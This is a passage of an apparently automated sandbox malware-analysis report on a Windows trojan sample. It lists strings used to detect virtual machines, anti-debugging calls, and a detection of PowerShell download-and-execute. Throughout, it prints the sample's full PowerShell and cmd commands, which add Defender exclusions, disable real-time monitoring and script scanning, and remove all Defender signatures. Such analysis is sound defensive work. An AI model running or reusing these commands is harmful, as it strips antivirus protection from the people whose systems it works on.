                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvmwareuser
                Source: Amcache.hve.29.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.29.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmusrvc
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
                Source: Amcache.hve.29.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.29.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.29.drBinary or memory string: vmci.syshbin
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D99000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5D99000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409474610.000001DCB5DAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmwaretray
                Source: Amcache.hve.29.drBinary or memory string: VMware, Inc.
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvboxtray
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
                Source: Amcache.hve.29.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.29.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.29.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.29.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f4vmusrvc
                Source: Amcache.hve.29.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: sfvmwaretray
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvboxtray
                Source: Amcache.hve.29.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: bound.exe, 00000011.00000002.1603619017.00000254B4EB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmsrvc
                Source: Amcache.hve.29.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.29.drBinary or memory string: \driver\vmci,\driver\pci
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmwareuser
                Source: Amcache.hve.29.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f8vmware
                Source: Amcache.hve.29.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                Source: Amcache.hve.29.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvboxservice
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmwareservice
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD0D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7EAD0D12C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E6C89060 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FF8E6C89060
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD23480 GetProcessHeap,0_2_00007FF7EAD23480
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD0D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7EAD0D12C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD0D30C SetUnhandledExceptionFilter,0_2_00007FF7EAD0D30C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD0C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7EAD0C8A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD1A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7EAD1A614
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD0D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7EAD0D12C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD0D30C SetUnhandledExceptionFilter,2_2_00007FF7EAD0D30C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD0C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF7EAD0C8A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD1A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7EAD1A614
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7963248 IsProcessorFeaturePresent,00007FF8F8751A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8F8751A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E7963248
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A21CB7 SetUnhandledExceptionFilter,2_2_00007FF8E7A21CB7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A2212B IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E7A2212B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A9DFFC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E7A9DFFC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80D4390 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E80D4390
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80F339C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E80F339C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E8133318 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E8133318
                Source: C:\Users\user\AppData\Local\Temp\bound.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: bound.exe PID: 7976, type: MEMORYSTR
                Source: Yara matchFile source: dropped/ConDrv, type: DROPPED
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'Jump to behavior
                Modifies Windows Defender protection settings
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                Removes signatures from Windows Defender
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
